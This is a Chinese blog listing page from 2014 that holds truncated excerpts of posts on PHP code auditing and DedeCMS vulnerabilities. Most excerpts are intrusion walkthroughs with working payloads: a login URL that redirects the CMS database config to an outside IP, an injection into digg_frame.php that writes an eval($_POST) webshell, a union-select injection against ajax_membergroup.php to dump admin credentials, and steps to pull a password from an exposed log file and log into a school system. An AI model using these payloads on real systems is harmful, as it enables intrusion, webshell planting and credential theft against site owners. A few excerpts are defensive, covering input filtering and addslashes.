上一页 1 ··· 63 64 65 66 67 68 69 70 71 ··· 84 下一页
  2014年3月31日
摘要: 在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示:$_REQUEST = filter_xss($_REQUEST);$_GET = filter_xss($_GET);$_POST = filter_xss($_POST);$_COOKIE = filter_xss($_COOKIE);$_POST = filter_sql($_ 阅读全文
posted @ 2014-03-31 18:32 milantgh 阅读(873) 评论(0) 推荐(0)
摘要: flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty($mid)) $mid = $this->M_ID;$dsql = new DedeSql();$row = $dsql->GetOne("Select ID,userid,pwd, 阅读全文
posted @ 2014-03-31 14:28 milantgh 阅读(462) 评论(0) 推荐(0)
摘要: 定义和用法addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。提示和注释提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合适的字符串。注释:默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导 阅读全文
posted @ 2014-03-31 14:23 milantgh 阅读(260) 评论(0) 推荐(0)
摘要: 简要描述:众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”详细说明:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0& 阅读全文
posted @ 2014-03-31 13:58 milantgh 阅读(441) 评论(0) 推荐(0)
  2014年3月30日
摘要: 1.查看dedecms最后升级版本:http://xxx.com/data/admin/ver.txt2.利用网上公开之0day进行对应版本之入侵ps:dedecms默认CMS后台:http://xxx.com/dede/ 阅读全文
posted @ 2014-03-30 22:24 milantgh 阅读(1124) 评论(0) 推荐(0)
摘要: 1.判断网站是否有log路径2.找到日志文件路径:jwc.xxx.com/log/2014-03-18-log.txt3.找到账户为jwc01的密码password4.登录教务系统 阅读全文
posted @ 2014-03-30 22:16 milantgh 阅读(407) 评论(0) 推荐(1)
摘要: 1、注入漏洞存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>注入成功,产生了注入文件。http://localhost:802/data/mysql_error_trace.php一句话木马连接上传大马即 阅读全文
posted @ 2014-03-30 20:38 milantgh 阅读(8743) 评论(0) 推荐(0)
摘要: 一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id四、爆密码的字段:/memb 阅读全文
posted @ 2014-03-30 20:25 milantgh 阅读(1915) 评论(0) 推荐(0)
摘要: 详细说明:member/buy_action.phprequire_once(dirname(__FILE__)."/config.php");CheckRank(0,0);$menutype = 'mydede';$menutype_son = 'op';require_once DEDEINC.'/dedetemplate.class.php';$product = isset($product) ? trim($product) : '';$mid = $cfg_ml->M_ID;$ptype = 阅读全文
posted @ 2014-03-30 20:15 milantgh 阅读(1305) 评论(0) 推荐(0)
摘要: 今天看到云舒在群里贴的漏洞公告,原始的文章在http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/后来查了下PHP官方的手册,这个问题是在PHP 5.3.7中更新了is_a()函数的功能。is_a()经常被用于条件判断。 在此前版本的is_a() 的第一个参数如果不是object,则会返回false,现在变成了如果不是object ,则会去执行 __autoload()函数。PHP为此还开了一个bug,但对此bug仍然有争议,部分开发人员认为这个功能是正常的。Aron Budins 阅读全文
posted @ 2014-03-30 09:43 milantgh 阅读(2137) 评论(0) 推荐(0)
上一页 1 ··· 63 64 65 66 67 68 69 70 71 ··· 84 下一页